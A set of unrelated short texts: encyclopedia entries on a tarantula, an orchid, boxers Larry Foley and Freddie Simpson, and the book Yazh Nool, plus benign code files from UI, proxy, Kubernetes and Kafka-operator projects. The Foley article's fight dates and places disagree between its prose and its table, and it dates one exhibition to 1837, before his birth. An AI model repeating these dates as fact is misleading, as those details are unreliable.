World Spider Catalog uses the name Sandinista lanceolatum. Distribution and habitat Sandinista lanceolatum is found in the Guanacaste Province in Costa Rica in the north-west Pacific lowlands, and several Departments of Nicaragua in similar Western lowlands. It is found in grasslands in dry tropical areas. The female described by Valerio was collected from a horizontal burrow which it shared with several juveniles. The relatively large chelicerae of the females may be connected to their burrowing habit. Conservation All species of Brachypelma, then including Sandinista lanceolatum as B. fossorium, were placed on CITES Appendix II in 1994, thus restricting trade. References External links – photographs taken in the wild Theraphosidae Spiders of Central America Spiders described in 1980
John Wylie may refer to: John Wylie (actor) (died 2004/1925–2004), American actor John Wylie (businessman) (born 1961), Australian investment banker John Wylie (footballer, born 1854) (1854–1924), English amateur footballer John Wylie (footballer, born 1936) (1936–2013), English footballer John Wylie (musician) (born 1974), hardcore musician from Florida John Wyllie (politician) (1835–1870), British member of parliament for Hereford John Wylie (surgeon) (1790–1852), Scottish military surgeon John Wylie, character on British soap opera Emmerdale See also John Wiley (disambiguation) John Wyllie (disambiguation) John Wyly (died 1400), member of the Parliament of England for Marlborough
Liparis elegans is a species of orchids. It is found in South East Asia (Indonesia, Papua New Guinea). References elegans Plants described in 1828
Laurence 'Larry' Foley (12 December 1849 – 12 July 1917) was an Australian middleweight boxer. An exceptional boxing instructor, his students included American champions Peter Jackson, and Tommy Burns, the incomparable English-born triple weight class champion Bob Fitzsimmons and Australian champion Mike Dooley. Due to his success as a boxing champion and internationally acclaimed instructor, and for introducing his country to the modern Queensberry Rules, he is often referred to as the "Father of Australian Boxing". Early life Foley was born to an Irish schoolmaster, Patrick, and his wife Mary (née Downs) in Bathurst, New South Wales on 12 December 1849. He was baptised a few years later on 2 May 1852 in Penrith. At three his family moved to Sydney, and at fourteen he moved to Wollongong as servant to a Roman Catholic priest with the expectation that he would join the priesthood. This never happened and instead, he returned to Sydney where at the age of 20, he worked as a building labourer and eventually as a sub-forman and building contractor. In Sydney, he joined a street-fighting gang in his youth, often fighting members of a rival Protestant group. His first fight, lasting seventy-one rounds, was believed to have been on 18 March 1871 against Sandy Ross, a leader of the rival 'Orange' or Protestant gang, and ended when police stopped the fight. He was known as 'Captain of the Push' after the Rocks Push street gang in Sydney. On 17 September 1873 he married Mary Anne Hayes. Sporting patron George Hill, a member of the “Fancy”, recognized Foley's exceptional ability and helped set up several exhibitions and Prizefights. Between 1872–76, Foley defeated at least six opponents by knockout in New South Wales, earning a reputation as a talented middleweight who in time might fight for a championship. On 2 December 1878, Foley fought a championship bout with Peter Newton, though the dates of the fight vary as do the number of rounds. The fight was declared a draw as the police intervened in the 40th round, and no decision of a winner was made. Career Middleweight world champion, 1879 Having abandoned street fighting, he moved into prizefights and exhibitions, winning or drawing all but one of them, including a gloved exhibition in 1877 with former English champion Jem Mace in Sydney, who would become a friend and mentor. On 20 March 1879, he fought Abe Hicken bare-knuckle by London Prize Ring Rules, four miles from Warparilla, near Echuca, on the New South Wales side of the River Murray. He had been reluctant to fight Abe Hicken in an antiquated bare-knuckle bout, and his friend Jem Mace discouraged him from accepting the challenge, but Hicken had claimed he was the true Australian champion, and Foley accepted the challenge regardless of the extra risk inherent in bare knuckle boxing under London Prize Ring Rules. Over a thousand spectators assembled at the remote spot to watch the contest for the Australian middleweight championship and a purse of £500 a side. Though not highly significant, he had an advantage of one or two inches and around five pounds on his opponent, and this factor may have influenced the early betting which gave Hicken, already a champion, odds of 2–1. The fight was considered by many to be the Middleweight championship of the world. A constable was sent to arrest both men for the illegal sport of prize fighting, and warrants for their arrest had been completed, but the policeman who attended the bout was ignored, and the fight commenced on time. Foley won by knockout in 16 rounds, in one hour and twenty minutes as Hicken, exhausted and badly beaten, fell. Back home in Sydney a concert and subscription fund were organized for Foley. Foley followed his victory over Hicken with a three round win by knockout over Harry Sellars on 1 July 1879 at Redfern in Sydney, though the dates of the bout vary somewhat. In the following years, though he continued to fight exhibitions and no decision bouts, Foley retired from his defence of the middleweight championship. Training champions By 1879, Foley had managed two Sydney hotels; first the United Service Hotel and then the White Horse. One of his responsibilities was tending bar at his hotels, though unlike many of his fellow boxers, he was a tetotaler by most accounts. After his victory over Hicken, Foley opened a boxing academy at his White Horse Hotel on George Street, though he likely held matches there earlier. Former English champion Jem Mace, who trained Foley for his championship bout with Hicken, helped open the school and continued as an instructor. At his gym at the White Horse, Foley taught, trained and guided the careers of the great boxers Young Griffo, Bob Fitzsimmons, Paddy Slavin, and Peter Jackson as well as the lesser known Dan Creedon and George Dawson. He was known worldwide for the quality of his boxing training, and acted as a promoter as well at times, helping to mold the career of his most gifted student Bob Fitzsimmons, who would become a champion in three weight classes. Foley's greatest contribution to boxing was as an advocate for the modern Marquess of Queensberry Rules, which revolutionized Australian boxing by allowing finesse, speed, and defensive technique to replace much of the brutality more common with the former London Prize Ring Rules. He helped introduce Queensberry Rules at his boxing academy and in the fights held there at his Ironpot Stadium in the back of the White Horse hotel, and he incorporated the scientific, straight-punching methods he learned during his own brilliant career into the techniques he taught his students. Australian heavyweight championship At the advanced age of 39, Foley came out of boxing retirement to fight a gloved battle using the modern Marquess of Queensberry Rules against "Professor" William Miller in Sydney, New South Wales on 28 May 1883 for the championship of Australia. Due to Miller's weight of around 190, the bout was a heavyweight championship. Unofficially declared a draw, the forty round bout and the £500 purse were given to Miller on the next day when Foley conceded he had lost the fight. Miller was a considerably larger and more muscular man, with nearly a forty pound advantage in weight to Foley's light middleweight class of around 158 pounds. The contest lasted three hours and would have been called far earlier if held today, as Foley took a great deal of punishment. Though he had a lead in the first hour, the tide turned and Miller's strong and constant left to Foley's face began to take its toll. In the 37th and 40th rounds, a right by Miller knocked Foley to the mat. Around the 40th round, spectators climbed into the ring, and the police were forced to stop the fight, with the referee postponing the ruling or calling a temporary draw til the following day. In 1884, Foley fought exhibitions to large crowds in Melbourne and Sydney with several of his top rated former opponents including both Miller and Hicken and strongly preferred to use gloves. Continuing a year of exhibitions, on 12 December 1885, he fought a four round no decision bout, which might be considered an exhibition, against the incomparable English champion Bob Fitzsimmons in Sydney. In his career, Foley acted as both a discoverer of Fitzsimmons' enormous talent, and as his boxing instructor from his earliest days in the ring. He fought an exhibition with another of his gifted students, Black boxer Peter Jackson, a future Australian heavyweight champion, in Sydney in May 1885. He continued to exclusively fight exhibitions and no decision bouts in 1886, but against somewhat less famous and accomplished opponents. On 30 July 1837 in Sydney, he fought a three round exhibition with his student Mick Dooley, a future Australian heavyweight champion. Flush with earnings from his lucrative year of exhibitions he married his second wife Mary Hoins on 12 November 1887 in Randwick. Foley fought two very short exhibitions with the first black American world heavyweight champion Jack Johnson in 1907-8 in Sydney. The first was a three round exhibition at Queen's Hall, and the second was a four round charity bout at Manley Skating Rink. Still a contemporary figure in some ways, Johnson was posthumously pardoned in 2018 by President Donald Trump for his 1912 Mann Act arrest. In one of his last known exhibitions on 2 May 1910, Foley sparred with onetime world and Australian heavyweight champion, American Tommy Burns in Sydney. The former middleweight champion also first appeared in October 1880 at Queens Theatre in Sydney in a production of As You Like It, as the character Charles, the wrestler. The touring American actress Louise Pomeroy played the character of "Rosalind". He briefly attempted to work as a theatre manager, and later appeared in several additional performances as Charles in Sydney in 1882 and at the Royal Standard Theatre from 1886–87. Work in the public sector Until his resignation in 1903, he was the official demolition contractor for New South Wales. Since his early days as a building laborer, he was an associate and friend of Edward O'Sullivan, the Sydney Minister of Public Works, as well as a journalist, politician, and labour party member, who held a seat in Parliament for eighteen years. In addition to his job as demolition contractor, his political contacts put him in consideration for a position as serjeant-at-arms in the Australian parliament, and he later contemplated running for the parliamentary seat for the city of Yass in 1903. Death Foley died of heart disease on 12 July 1917, at Vincent's Hospital in Sydney and after a mass at St. Mary's Cathedral on July 15, he was buried in the Catholic section of Waverley Cemetery. He was survived by a son and two daughters from his first marriage and three sons and a daughter from his second. His funeral was well attended and due to his years of public service included the Mayor of Sydney, and a number of aldermen and city officials. Selected fights |- | align="center" colspan=8|2 Wins, 1 Draw, 1 Loss |- | align="center" style="border-style: none none solid solid; background: #e3e3e3"|Result | align="center" style="border-style: none none solid solid; background: #e3e3e3"|Opponent(s) | align="center" style="border-style: none none solid solid; background: #e3e3e3"|Date | align="center" style="border-style: none none solid solid; background: #e3e3e3"|Location | align="center" style="border-style: none none solid solid; background: #e3e3e3"|Duration | align="center" style="border-style: none none solid solid; background: #e3e3e3"|Notes |- | Win | Sandy Ross | 9 March 1871 | Sydney, New South Wales | 4 Rounds, Won by KnockoutLondon Prize Ring Rules | Ross was once a leader of a rival Protestant gangHe was three inches taller, and thirty pounds heavier |- | style="background: #dae2f1"|Draw | Peter Newton | 2 Dec 1878 | Melbourne, Australia | 42 Rounds, ruled a drawPoorly publicized bout with gloves | Stopped by police, but believed to be a championship boutAlso fought twice, July 1886, Foley's White Horse Gym |- | Win | Abe Hicken | 9 March 1879 | Echuca, New South Wales | 16 Rounds, Won by KnockoutLondon Prize Ring Rules | Bare knuckle Middleweight Championship of Australia |- | Loss | William Miller | 20 May 1883 | Melbourne, Victoria, Australia | 40 rounds, spectators broke into ringMarquess of Queensberry Rules | Lost attempt at Australian Heavyweight Championship, Conceded loss |- References External links Larry Foley career stats 1900 interview with Larry Foley in The Bulletin Bibliography Roberts, Kenneth, (1963) Captain of the Push, Melbourne Australia, Landsdowne Press 1849 births 1917 deaths Sportspeople from Bathurst, New South Wales Sportsmen from New South Wales Australian male boxers Bare-knuckle boxers Middleweight boxers Australian boxing trainers Sport Australia Hall of Fame inductees Sportspeople from the Colony of New South Wales
```xml import * as React from 'react'; import { TextField, Stack, Checkbox, SearchBox, Link, Label, Text, ThemeProvider } from '@fluentui/react'; import { AzureThemeLight, AzureThemeDark, AzureThemeHighContrastLight, AzureThemeHighContrastDark, } from '@fluentui/azure-themes'; import { DefaultButton, CompoundButton, PrimaryButton } from '@fluentui/react/lib/Button'; import { CommandBarSplitDisabledExample } from '../components/commandBarButton.stories'; import { ButtonSplitExample } from '../components/splitButton.stories'; import { ButtonIconExample } from '../components/iconButton.stories'; import { ButtonIconWithTooltipExample } from '../components/iconTooltip.stories'; import { ButtonContextualMenuExample } from '../components/contextualMenu.stories'; import { ButtonActionExample } from '../components/actionButton.stories'; import { ButtonToggleExample } from '../components/buttonToggle.stories'; import { CalloutBasicExample } from '../components/callout.stories'; import { ActivityItemBasicExample } from '../components/activityitem.stories'; import { ChoiceGroupBasicExample } from '../components/choicegroup.stories'; import { ToggleBasicExample } from '../components/toggle.stories'; import { ColorPickerBasicExample } from '../components/colorpicker.stories'; import { ComboBoxBasicExample } from '../components/comboBox.stories'; import { ContextualMenuDefaultExample } from '../components/ContextMenu.stories'; import { DropdownBasicExample } from '../components/dropdown.stories'; import { CommandBarBasicExample } from '../components/commandBar.stories'; import { TagPickerBasicExample } from '../components/tags.stories'; import { DetailsListCompactExample } from '../components/detailsList.stories'; import { DatePickerBoundedExample } from '../components/dateBoundary.stories'; import { PivotBasicExample } from '../components/Pivots.stories'; import { TeachingBubbleBasicExample } from '../components/TeachingBubble.stories'; import { MessageBarBasicExample } from '../components/messageBar.stories'; import { TooltipBasicExample } from '../components/tooltip.stories'; import { SliderBasicExample } from '../components/slider.stories'; import { SpinButtonBasicExample } from '../components/SpinButton.stories'; import { DatePickerBasicExample } from '../components/defaultDatePicker'; import { ProgressIndicatorBasicExample } from '../components/ProgressIndicator.stories'; import { CalendarInlineMultidayDayViewExample } from '../components/CalendarInlineMultidayDayView.stories'; import { SpinnerBasicExample } from '../components/spinner.stories'; import { DetailsListCustomColumnsExample } from '../components/DetailsListCustomColumnsExample.stories'; import { ChoiceGroupImageExample } from '../components/choiceGroupWithImagesandIcons.stories'; import { DetailsListCustomGroupHeadersExample } from '../components/detailsListGroupedHeader.stories'; export default { title: 'Components/Themes', }; const Example = () => ( <Stack gap={8} horizontalAlign="center" style={{ maxWidth: 1000 }}> <Stack gap={8} horizontalAlign="center"> <Text>13px body text</Text> <Label>MessageBar / InfoBox</Label> <MessageBarBasicExample /> <Label>TeachingBubble</Label> <TeachingBubbleBasicExample /> <Label>Pivots</Label> <PivotBasicExample /> <Label>Buttons</Label> <DefaultButton text="DefaultButton" /> <PrimaryButton text="PrimaryButton" /> <CompoundButton primary text="CompoundButton" /> <CompoundButton secondaryText="secondary text." text="CompoundButton" /> <DefaultButton primary={true} text="Default button as primary" /> <DefaultButton primary={true} disabled={true} text="Default w/ primary disabled" /> <Label>Danger buttons (both primary and default)</Label> <DefaultButton className="danger" text="danger defaultbutton" /> <PrimaryButton className="danger" text="danger primarybutton" /> <Label>Tag buttons (both primary and default)</Label> <DefaultButton className="tag" text="tag defaultbutton" /> <PrimaryButton className="tag" text="tag primarybutton" /> <Label>Disabled Buttons</Label> <DefaultButton disabled text="DefaultButton disabled" /> <PrimaryButton disabled text="PrimaryButton disabled" /> <DefaultButton allowDisabledFocus={true} disabled text="DefaultButton allowDisabledFocus" /> <PrimaryButton allowDisabledFocus={true} disabled text="PrimaryButton allowDisabledFocus" /> <CompoundButton disabled primary text="CompoundButton primary disabled" /> <Label disabled>I am a disabled label</Label> <Label>Icon Buttons</Label> <ButtonIconExample checked={false} /> <Label>CommandBarSplitDisabledExample</Label> <CommandBarSplitDisabledExample /> <ButtonIconWithTooltipExample /> <ButtonContextualMenuExample /> <ButtonActionExample /> <Label>Toggle button</Label> <ButtonToggleExample /> <ButtonSplitExample checked={false} /> <CalloutBasicExample /> <DefaultButton text="WIP: default button > primary" primary /> <DefaultButton text="WIP: Primary button" primary /> <Label>Tooltip</Label> <TooltipBasicExample /> </Stack> <Stack gap={8} horizontalAlign="center" style={{ marginTop: 40 }}> <Label>DetailsList / Grid</Label> <DetailsListCompactExample /> <DetailsListCustomColumnsExample /> <Label>DetailsList Custom Header</Label> <DetailsListCustomGroupHeadersExample /> </Stack> <Stack gap={8} horizontalAlign="center" style={{ marginTop: 40 }}> <Label>Slider</Label> <SliderBasicExample /> </Stack> <Stack gap={8} horizontalAlign="center" style={{ marginTop: 40 }}> <Label>Progress Indicator</Label> <ProgressIndicatorBasicExample /> </Stack> <Stack gap={8} horizontalAlign="center" style={{ marginTop: 40 }}> <Label className="section">DatePicker</Label> <DatePickerBasicExample /> <DatePickerBoundedExample /> <CalendarInlineMultidayDayViewExample /> </Stack> <Stack gap={8} horizontalAlign="center" style={{ marginTop: 40 }}> <Label>Picker</Label> <TagPickerBasicExample /> </Stack> <Stack gap={8} horizontalAlign="center" style={{ marginTop: 40 }}> <Label>CommandBar</Label> <CommandBarBasicExample /> </Stack> <Stack gap={8} horizontalAlign="center" style={{ marginTop: 40 }}> <Label>Checkboxes</Label> <Checkbox label="Unchecked checkbox (uncontrolled)" /> <Checkbox label="Checked checkbox (uncontrolled)" defaultChecked /> <Checkbox label="Disabled checkbox" disabled /> <Checkbox label="Disabled checked checkbox" disabled defaultChecked /> </Stack> <Stack gap={8} horizontalAlign="center" style={{ marginTop: 40 }}> <Checkbox label="Indeterminate checkbox (uncontrolled)" defaultIndeterminate /> <Checkbox label="Indeterminate checkbox which defaults to true when clicked (uncontrolled)" defaultIndeterminate defaultChecked={true} /> <Checkbox label="Disabled indeterminate checkbox" disabled defaultIndeterminate /> <Checkbox label="Indeterminate checkbox (controlled)" indeterminate={true} /> </Stack> <Stack gap={8} horizontalAlign="center" style={{ marginTop: 40 }}> <Label>Links</Label> <Link>Hello I am a link, hover underline</Link> </Stack> <Link>Loader / Spinner</Link> <SpinnerBasicExample /> <Stack gap={8} horizontalAlign="center" style={{ marginTop: 40 }}> <Label>ComboBox</Label> <ComboBoxBasicExample /> </Stack> <Stack gap={8} horizontalAlign="center" style={{ marginTop: 40 }}> <Label>Dropdowns</Label> <DropdownBasicExample /> </Stack> <Stack gap={8} horizontalAlign="center" style={{ marginTop: 40 }}> <Label>Search / input fields</Label> <SearchBox /> <TextField disabled placeholder="disabled placeholder" /> <TextField disabled value="disabled text" /> <TextField placeholder="Hello" /> <TextField errorMessage="Error message!" /> </Stack> <Stack gap={8} horizontalAlign="center" style={{ marginTop: 40 }}> <Label>Spin button example</Label> <SpinButtonBasicExample /> </Stack> <Stack gap={8} horizontalAlign="center" style={{ marginTop: 40 }}> <Label>Misc</Label> <ActivityItemBasicExample /> <ChoiceGroupBasicExample /> <ChoiceGroupImageExample /> <ToggleBasicExample /> <ColorPickerBasicExample /> <ContextualMenuDefaultExample /> </Stack> </Stack> ); export const Light = () => ( <ThemeProvider theme={AzureThemeLight} applyTo="body"> <Example /> </ThemeProvider> ); export const Dark = () => ( <ThemeProvider theme={AzureThemeDark} applyTo="body"> <Example /> </ThemeProvider> ); export const HighContrastLight = () => ( <ThemeProvider theme={AzureThemeHighContrastLight} applyTo="body"> <Example /> </ThemeProvider> ); export const HighContrastDark = () => ( <ThemeProvider theme={AzureThemeHighContrastDark} applyTo="body"> <Example /> </ThemeProvider> ); ```
```css /* chango-400normal - latin */ @font-face { font-family: 'Chango'; font-style: normal; font-display: swap; font-weight: 400; src: local('Chango Regular '), local('Chango-Regular'), url('./files/chango-latin-400.woff2') format('woff2'), /* Super Modern Browsers */ url('./files/chango-latin-400.woff') format('woff'); /* Modern Browsers */ } ```
Sowrey is a surname. Notable people with the surname include: Ben Sowrey (born 1991), English rugby union player Frederick Sowrey (1893–1968), flying ace of the First World War Freddie Sowrey (1922–2019), senior Royal Air Force officer, son of Frederick See also Sorey
Yazh Nool or Yal Nool (; ; lit. The Book of Yazh) is a musical research book on yazh, one of the ancient musical instruments of the Tamils. The book was written by Swami Vipulananda and first published in June 1947 at Tirukkollampudur Vilvaranyeswarar Temple with the support of The Karanthai Tamil Sangam and financial support of Nachandupatti, P.RM.RM.ST Sitambaram Chettiar. The book is considered one of Vipulananda's significant works as well as an important treatise on the musical heritage of yazh. Background The ancient poetic work Silappatikaram provides some details about ancient Tamil music and yazh. However, it does not accurately define Tamil music and yazh. Its poetic old Tamil is hard to understand in the modern Tamil language, and some Tamil scholars find it difficult to translate its teachings into a modern context. For these reasons, Swami Vipulananda undertook his research on Tamil music and yazh. Description The book presents in-depth research on several ancient books that describe Tamil musical melody. It notably describes six different types of forgotten yazh instruments: Vil yazh, Peri yazh, Makara yazh, Cakota yazh, Seeri yazh, and Cenkotti yazh. Swami Vipulananda spent 14 years researching the book. The book has become the basis for the central concept of yazh and is used as a research tool by scholars. Publishing history Three editions of the work have been published. The 1947 and 1974 editions were published by Karanthai Tamil Sangam; the second edition includes the author's English-language essay "A 1000-Stringed Yazh". The third edition was published in 2003 by Yathumagi Printers in Tirunelveli. References External links Yazh Nool (2nd edition) Tamil music Sri Lankan Tamil literature 1947 non-fiction books
Frederick John Simpson (June 18, 1916 – December 23, 1974) was a British boxer who competed in the 1936 Summer Olympics. He fought as Freddie Simpson. In 1936 he was eliminated in the first round of the lightweight class after losing his fight to Andy Scrivani. He won the 1936 Amateur Boxing Association British lightweight title, when boxing out of the Battersea ABC. External links profile References 1916 births 1974 deaths Lightweight boxers Olympic boxers for Great Britain Boxers at the 1936 Summer Olympics British male boxers
```shell #!/usr/bin/env bash source $(dirname "${BASH_SOURCE[0]}")/../../_mesh_test.sh RunTest mesh_transport_seg_ivu transport_tx_seg_ivu transport_rx_seg_ivu overlay=overlay_psa_conf RunTest mesh_transport_seg_ivu_psa transport_tx_seg_ivu transport_rx_seg_ivu ```
```objective-c #pragma once #include "envoy/tcp/conn_pool.h" namespace Envoy { namespace Extensions { namespace NetworkFilters { namespace ThriftProxy { /** * ThriftConnectionState tracks thrift-related connection state for pooled connections. */ class ThriftConnectionState : public Tcp::ConnectionPool::ConnectionState { public: ThriftConnectionState(int32_t initial_sequence_id = 0) : next_sequence_id_(initial_sequence_id) {} /** * @return int32_t the next Thrift sequence id to use for this connection. */ int32_t nextSequenceId() { if (next_sequence_id_ == std::numeric_limits<int32_t>::max()) { next_sequence_id_ = 0; return std::numeric_limits<int32_t>::max(); } return next_sequence_id_++; } /** * @return true if this upgrade has been attempted on this connection. */ bool upgradeAttempted() const { return upgrade_attempted_; } /** * @return true if this connection has been upgraded */ bool isUpgraded() const { return upgraded_; } /** * Marks the connection as successfully upgraded. */ void markUpgraded() { upgrade_attempted_ = true; upgraded_ = true; } /** * Marks the connection as not upgraded. */ void markUpgradeFailed() { upgrade_attempted_ = true; upgraded_ = false; } private: int32_t next_sequence_id_; bool upgrade_attempted_{false}; bool upgraded_{false}; }; } // namespace ThriftProxy } // namespace NetworkFilters } // namespace Extensions } // namespace Envoy ```
```xml import { ObservableInput, OperatorFunction } from '../types'; export declare function switchMapTo<R>(observable: ObservableInput<R>): OperatorFunction<any, R>; /** @deprecated resultSelector is no longer supported. Switch to using switchMap with an inner map */ export declare function switchMapTo<T, R>(observable: ObservableInput<R>, resultSelector: undefined): OperatorFunction<T, R>; /** @deprecated resultSelector is no longer supported. Switch to using switchMap with an inner map */ export declare function switchMapTo<T, I, R>(observable: ObservableInput<I>, resultSelector: (outerValue: T, innerValue: I, outerIndex: number, innerIndex: number) => R): OperatorFunction<T, R>; ```
```go /* path_to_url Unless required by applicable law or agreed to in writing, software WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. */ package v1alpha1 // This file contains a collection of methods that can be used from go-restful to // generate Swagger API documentation for its models. Please read this PR for more // information on the implementation: path_to_url // // TODOs are ignored from the parser (e.g. TODO(andronat):... || TODO:...) if and only if // they are on one line! For multiple line or blocks that you want to ignore use ---. // Any context after a --- is ignored. // // Those methods can be generated by using hack/update-generated-swagger-docs.sh // AUTO-GENERATED FUNCTIONS START HERE. DO NOT EDIT. var map_AggregationRule = map[string]string{ "": "AggregationRule describes how to locate ClusterRoles to aggregate into the ClusterRole", "clusterRoleSelectors": "ClusterRoleSelectors holds a list of selectors which will be used to find ClusterRoles and create the rules. If any of the selectors match, then the ClusterRole's permissions will be added", } func (AggregationRule) SwaggerDoc() map[string]string { return map_AggregationRule } var map_ClusterRole = map[string]string{ "": "ClusterRole is a cluster level, logical grouping of PolicyRules that can be referenced as a unit by a RoleBinding or ClusterRoleBinding. Deprecated in v1.17 in favor of rbac.authorization.k8s.io/v1 ClusterRole, and will no longer be served in v1.20.", "metadata": "Standard object's metadata.", "rules": "Rules holds all the PolicyRules for this ClusterRole", "aggregationRule": "AggregationRule is an optional field that describes how to build the Rules for this ClusterRole. If AggregationRule is set, then the Rules are controller managed and direct changes to Rules will be stomped by the controller.", } func (ClusterRole) SwaggerDoc() map[string]string { return map_ClusterRole } var map_ClusterRoleBinding = map[string]string{ "": "ClusterRoleBinding references a ClusterRole, but not contain it. It can reference a ClusterRole in the global namespace, and adds who information via Subject. Deprecated in v1.17 in favor of rbac.authorization.k8s.io/v1 ClusterRoleBinding, and will no longer be served in v1.20.", "metadata": "Standard object's metadata.", "subjects": "Subjects holds references to the objects the role applies to.", "roleRef": "RoleRef can only reference a ClusterRole in the global namespace. If the RoleRef cannot be resolved, the Authorizer must return an error.", } func (ClusterRoleBinding) SwaggerDoc() map[string]string { return map_ClusterRoleBinding } var map_ClusterRoleBindingList = map[string]string{ "": "ClusterRoleBindingList is a collection of ClusterRoleBindings. Deprecated in v1.17 in favor of rbac.authorization.k8s.io/v1 ClusterRoleBindings, and will no longer be served in v1.20.", "metadata": "Standard object's metadata.", "items": "Items is a list of ClusterRoleBindings", } func (ClusterRoleBindingList) SwaggerDoc() map[string]string { return map_ClusterRoleBindingList } var map_ClusterRoleList = map[string]string{ "": "ClusterRoleList is a collection of ClusterRoles. Deprecated in v1.17 in favor of rbac.authorization.k8s.io/v1 ClusterRoles, and will no longer be served in v1.20.", "metadata": "Standard object's metadata.", "items": "Items is a list of ClusterRoles", } func (ClusterRoleList) SwaggerDoc() map[string]string { return map_ClusterRoleList } var map_PolicyRule = map[string]string{ "": "PolicyRule holds information that describes a policy rule, but does not contain information about who the rule applies to or which namespace the rule applies to.", "verbs": "Verbs is a list of Verbs that apply to ALL the ResourceKinds and AttributeRestrictions contained in this rule. VerbAll represents all kinds.", "apiGroups": "APIGroups is the name of the APIGroup that contains the resources. If multiple API groups are specified, any action requested against one of the enumerated resources in any API group will be allowed.", "resources": "Resources is a list of resources this rule applies to. ResourceAll represents all resources.", "resourceNames": "ResourceNames is an optional white list of names that the rule applies to. An empty set means that everything is allowed.", "nonResourceURLs": "NonResourceURLs is a set of partial urls that a user should have access to. *s are allowed, but only as the full, final step in the path Since non-resource URLs are not namespaced, this field is only applicable for ClusterRoles referenced from a ClusterRoleBinding. Rules can either apply to API resources (such as \"pods\" or \"secrets\") or non-resource URL paths (such as \"/api\"), but not both.", } func (PolicyRule) SwaggerDoc() map[string]string { return map_PolicyRule } var map_Role = map[string]string{ "": "Role is a namespaced, logical grouping of PolicyRules that can be referenced as a unit by a RoleBinding. Deprecated in v1.17 in favor of rbac.authorization.k8s.io/v1 Role, and will no longer be served in v1.20.", "metadata": "Standard object's metadata.", "rules": "Rules holds all the PolicyRules for this Role", } func (Role) SwaggerDoc() map[string]string { return map_Role } var map_RoleBinding = map[string]string{ "": "RoleBinding references a role, but does not contain it. It can reference a Role in the same namespace or a ClusterRole in the global namespace. It adds who information via Subjects and namespace information by which namespace it exists in. RoleBindings in a given namespace only have effect in that namespace. Deprecated in v1.17 in favor of rbac.authorization.k8s.io/v1 RoleBinding, and will no longer be served in v1.20.", "metadata": "Standard object's metadata.", "subjects": "Subjects holds references to the objects the role applies to.", "roleRef": "RoleRef can reference a Role in the current namespace or a ClusterRole in the global namespace. If the RoleRef cannot be resolved, the Authorizer must return an error.", } func (RoleBinding) SwaggerDoc() map[string]string { return map_RoleBinding } var map_RoleBindingList = map[string]string{ "": "RoleBindingList is a collection of RoleBindings Deprecated in v1.17 in favor of rbac.authorization.k8s.io/v1 RoleBindingList, and will no longer be served in v1.20.", "metadata": "Standard object's metadata.", "items": "Items is a list of RoleBindings", } func (RoleBindingList) SwaggerDoc() map[string]string { return map_RoleBindingList } var map_RoleList = map[string]string{ "": "RoleList is a collection of Roles. Deprecated in v1.17 in favor of rbac.authorization.k8s.io/v1 RoleList, and will no longer be served in v1.20.", "metadata": "Standard object's metadata.", "items": "Items is a list of Roles", } func (RoleList) SwaggerDoc() map[string]string { return map_RoleList } var map_RoleRef = map[string]string{ "": "RoleRef contains information that points to the role being used", "apiGroup": "APIGroup is the group for the resource being referenced", "kind": "Kind is the type of resource being referenced", "name": "Name is the name of resource being referenced", } func (RoleRef) SwaggerDoc() map[string]string { return map_RoleRef } var map_Subject = map[string]string{ "": "Subject contains a reference to the object or user identities a role binding applies to. This can either hold a direct API object reference, or a value for non-objects such as user and group names.", "kind": "Kind of object being referenced. Values defined by this API group are \"User\", \"Group\", and \"ServiceAccount\". If the Authorizer does not recognized the kind value, the Authorizer should report an error.", "apiVersion": "APIVersion holds the API group and version of the referenced subject. Defaults to \"v1\" for ServiceAccount subjects. Defaults to \"rbac.authorization.k8s.io/v1alpha1\" for User and Group subjects.", "name": "Name of the object being referenced.", "namespace": "Namespace of the referenced object. If the object kind is non-namespace, such as \"User\" or \"Group\", and this value is not empty the Authorizer should report an error.", } func (Subject) SwaggerDoc() map[string]string { return map_Subject } // AUTO-GENERATED FUNCTIONS END HERE ```
```java /* */ package io.strimzi.operator.cluster.operator.resource.kubernetes; import com.fasterxml.jackson.core.type.TypeReference; import com.fasterxml.jackson.databind.ObjectMapper; import io.fabric8.kubernetes.api.model.ContainerBuilder; import io.fabric8.kubernetes.api.model.LabelSelectorBuilder; import io.fabric8.kubernetes.api.model.Pod; import io.fabric8.kubernetes.api.model.PodBuilder; import io.fabric8.kubernetes.client.KubernetesClient; import io.fabric8.kubernetes.client.KubernetesClientException; import io.strimzi.api.kafka.model.podset.StrimziPodSet; import io.strimzi.api.kafka.model.podset.StrimziPodSetBuilder; import io.strimzi.api.kafka.model.podset.StrimziPodSetList; import io.strimzi.operator.common.Reconciliation; import io.strimzi.test.TestUtils; import io.vertx.core.Promise; import io.vertx.junit5.Checkpoint; import io.vertx.junit5.Timeout; import io.vertx.junit5.VertxExtension; import io.vertx.junit5.VertxTestContext; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; import org.hamcrest.Matchers; import org.junit.jupiter.api.Test; import org.junit.jupiter.api.extension.ExtendWith; import java.util.Map; import java.util.concurrent.TimeUnit; import java.util.concurrent.atomic.AtomicReference; import static org.hamcrest.CoreMatchers.instanceOf; import static org.hamcrest.CoreMatchers.is; import static org.hamcrest.MatcherAssert.assertThat; /** * The main purpose of the Integration Tests for the operators is to test them against a real Kubernetes cluster. * Real Kubernetes cluster has often some quirks such as some fields being immutable, some fields in the spec section * being created by the Kubernetes API etc. These things are hard to test with mocks. These IT tests make it easy to * test them against real clusters. */ @ExtendWith(VertxExtension.class) public class StrimziPodSetCrdOperatorIT extends AbstractCustomResourceOperatorIT<KubernetesClient, StrimziPodSet, StrimziPodSetList> { protected static final Logger LOGGER = LogManager.getLogger(StrimziPodSetCrdOperatorIT.class); private final ObjectMapper mapper = new ObjectMapper(); @Override protected StrimziPodSetOperator operator() { return new StrimziPodSetOperator(vertx, client); } @Override protected String getCrd() { return TestUtils.CRD_STRIMZI_POD_SET; } @Override protected String getCrdName() { return StrimziPodSet.CRD_NAME; } @Override protected String getNamespace() { return "strimzipodset-crd-it-namespace"; } @SuppressWarnings("unchecked") @Override protected StrimziPodSet getResource(String resourceName) { Pod pod = new PodBuilder() .withNewMetadata() .withName("broker") .withLabels(Map.of("role", "broker")) .endMetadata() .withNewSpec() .withContainers(new ContainerBuilder().withName("broker").withImage("kafka:latest").build()) .endSpec() .build(); return new StrimziPodSetBuilder() .withNewMetadata() .withName(resourceName) .withNamespace(getNamespace()) .endMetadata() .withNewSpec() .withSelector(new LabelSelectorBuilder().withMatchLabels(Map.of("role", "broker")).build()) .withPods(mapper.convertValue(pod, new TypeReference<Map<String, Object>>() { })) .endSpec() 